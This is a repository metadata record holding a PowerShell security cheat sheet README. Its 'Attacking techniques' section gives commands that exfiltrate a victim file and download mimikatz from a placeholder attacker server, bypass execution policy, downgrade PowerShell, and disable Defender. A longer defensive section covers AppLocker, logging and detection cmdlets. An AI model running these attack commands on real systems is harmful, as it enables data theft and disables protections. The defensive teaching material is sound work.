{"id":18401139,"url":"https://github.com/d3fenderz/powershell_commands","last_synced_at":"2026-03-03T22:02:37.742Z","repository":{"id":65630384,"uuid":"596134949","full_name":"d3fenderz/powershell_commands","owner":"d3fenderz","description":"Personal sheet for PowerShell 🧢","archived":false,"fork":false,"pushed_at":"2023-04-13T13:25:45.000Z","size":21,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-03-02T01:24:24.478Z","etag":null,"topics":["blueteam","cheatsheet","guide","pentesting","powershell","security-guide","windows"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/d3fenderz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-02-01T14:41:45.000Z","updated_at":"2023-09-13T12:12:14.000Z","dependencies_parsed_at":"2024-11-06T03:05:16.305Z","dependency_job_id":null,"html_url":"https://github.com/d3fenderz/powershell_commands","commit_stats":null,"previous_names":["d3fenderz/powershell_commands"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/d3fenderz/powershell_commands","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d3fenderz%2Fpowershell_commands","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d3fenderz%2Fpowershell_commands/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d3fenderz%2Fpowershell_commands/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d3fenderz%2Fpowershell_commands/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/d3fenderz","download_url":"https://codeload.github.com/d3fenderz/powershell_commands/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d3fenderz%2Fpowershell_commands/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30063367,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-03T18:21:05.932Z","status":"ssl_error","status_checked_at":"2026-03-03T18:20:59.341Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blueteam","cheatsheet","guide","pentesting","powershell","security-guide","windows"],"created_at":"2024-11-06T02:37:49.992Z","updated_at":"2026-03-03T22:02:37.720Z","avatar_url":"https://github.com/d3fenderz.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# PowerShell Commands\n\nPersonal sheet for PowerShell 🧢\n\nTO BE CONTINUED indefinitely...\n\n![GitHub last commit](https://img.shields.io/github/last-commit/d3fenderz/powershell_commands?label=last%20update%3A)\n\n## Attacking techniques: practical examples\n\n### HTTP requests\n\n#### Exfiltrate data\n\n```powershell\nPowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri https://{ATTACKER_IP_SERVER} -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\\Users\\Victim\\path\\to\\data.xml')))\n```\n\n#### Download attacking tools\n\n```powershell\nPowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -Method GET -uri https://{ATTACKER_IP_SERVER}/exec/mimikatz.exe -OutFile \"c:\\Users\\Victim\\mimi.exe\"\n```\n\n### Bypass Execution policy\n\n```powershell\nPowerShell.exe -noprofile -executionpolicy bypass -file .\\malicious.ps1\n```\n\nor:\n\n```powershell\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force\n```\n\nSetting the execution policy to `RemoteSigned` only allows running unsigned scripts.\n\n### Exploit debugging variables\n\n```\n__PSLockdownPolicy\n```\n\nIf this env var is set on production, there's a chance admins think it's a safety measure.\n\n### Place a downgrade attack\n\n```powershell\nPowerShell.exe -Version 2\n```\n\nOlder versions of PS have less security features according to the [unicorn](https://github.com/trustedsec/unicorn).\n\n### Run PowerShell commands without PowerShell.exe\n\nYou can use [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) or the more recent [PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell).\n\n### Disable critical protections\n\n```powershell\nSet-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableIOAVProtection $true\n```\n\n### Attack RDP connections\n\nIf admins use misconfigured RDP (remote desktop protocol) for remoting, it can be Brute-Forced to pass malicious cmdlets.\n\n## Defense\n\n### Limit unconstrained code execution\n\n```powershell\n$ExecutionContext.SessionState.LanguageMode = \"ConstrainedLanguage\"\n```\n\nDefault since PowerShell v5 if you use AppLocker.\n\n### Use Applocker\n\n#### Overview\n\n[Overview by Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview)\n\n#### cmdlets for AppLocker\n\n##### Get the current AppLocker configuration\n\n```powershell\nGet-AppLockerPolicy -Effective\n```\n\n#### Create an AppLocker policy\n\n```powershell\nNew-AppLockerPolicy\n```\n\n#### Test an exec against the AppLocker policy\n\n```powershell\nTest-AppLockerPolicy -Path \u003cpath_to_exec\u003e\n```\n\n### Add GPOs (Group policies)\n\n#### Enable Module and Script block logging\n\nGo to Windows Configuration \u003e Policies \u003e Administrative Settings \u003e Windows Components \u003e Windows PowerShell\n\n* Turn on Module Logging\n* Turn on PowerShell Script Block Logging\n\nor with PowerShell:\n\n```powershell\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\"  -Name EnableModuleLogging -Value \"1\"\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" -Name EnableScriptBlockInvocationLogging -Value \"1\"\n```\n\nThen, it's possible to connect logs to a SIEM or a similar software.\n\n#### Enable transcripting\n\nGPO or:\n\n```powershell\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\" -Name \"EnableTranscripting\" -Value \"1\"\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\" -Name \"EnableInvocationHeader\" -Value \"1\"\n```\n\n#### Enable Protected Event Logging\n\nGo to Windows Components -\u003e Administrative Templates -\u003e Event Logging: \"Enable Protected Event Logging.\" You 'll have to provide a valid certificate.\n\nor:\n\n```powershell\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging\" -Name \"EnableProtectedEventLogging\" -Value \"1\"\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging\" -Name \"EncryptionCertificate\" -Value $Certificate\n```\n\nWhere `$Certificate` is your certificate.\n\n### Set Execution policy\n\n```powershell\nGet-ExecutionPolicy\nSet-executionpolicy restricted\n```\n\n`restricted` should be default, but check it.\n\n### Anti-Downgrade\n\n```powershell\nDisable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root\n```\n\nMore advanced tricks [there](https://www.leeholmes.com/detecting-and-preventing-powershell-downgrade-attacks/)\n\n### Challenges for attackers\n\nSome attacks attempt to modify settings and disable some protections. There are important inconveniences for attackers, though:\n\n* most commands require an elevated shell\n* notifications are sent by default\n* Windows events are triggered by default\n\n### Suspicious Cmdlets\n\nMany legitimate commands like `Invoke-WebRequest` can be exploited by attackers, but some cmdlets look more suspicious than others. Here are a few examples:\n\n* `Invoke-Mimikatz`\n* `Invoke-ShellCode`\n* `Get-FileHash`\n* `Invoke-DllInjection`\n* `Get-Hotfix | measure`\n\nIt often means attackers used a known tool (e.g, PowerSploit, Mimikatz, Powercat) or performed advanced enumeration.\n\n### Enable JEA\n\nJEA (Just Enough Administration) allows more control over PowerShell, especially if you need more granularity on cmdlets and security for remoting.\n\n[Source: Microsoft JEA](https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3)\n\n### Misc: other helpful commands\n\n#### Get list of installed software\n\n```powershell\nGet-WmiObject Win32_Product | Select-Object Name\n```\n\n#### Get list of running processes\n\n```powershell\nGet-Process\n```\n\n#### Get network connections\n\n```powershell\nGet-NetTCPConnection\n```\n\n#### Get active firewall rules\n\n```powershell\nGet-NetFirewallRule\n```\n\n#### Get list of scheduled tasks\n\n```powershell\nGet-ScheduledTask\n```\n\n#### Get event logs\n\n```powershell\nGet-EventLog -LogName Security\n```\n\n#### Search for specific event logs\n\n```powershell\nGet-EventLog -LogName Security | Where-Object {$_.EventID -eq \u003cevent_id\u003e}\n```\n\n#### Get list of local user accounts\n\n```powershell\nGet-LocalUser\n```\n\n#### Get list of local group accounts\n\n```powershell\nGet-LocalGroup\n```\n\n#### Get list of environment variables\n\n```powershell\nGet-ChildItem Env:\n```\n\n#### Get list of services\n\n```powershell\nGet-Service\n```\n\n#### Start a service\n\n```powershell\nStart-Service -Name \u003cservice\u003e\n```\n\n#### Stop a service\n\n```powershell\nStop-Service \u003cservice\u003e\n```\n\n#### Stop a running process\n\n```powershell\nStop-Process -Name \u003cprocess\u003e\n```\n\n#### Remove a scheduled task\n\n```powershell\nUnregister-ScheduledTask -TaskName \u003ctask\u003e\n```\n\n#### Disable a firewall rule\n\n```powershell\nDisable-NetFirewallRule -DisplayName \u003crule\u003e\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3fenderz%2Fpowershell_commands","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3fenderz%2Fpowershell_commands","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3fenderz%2Fpowershell_commands/lists"}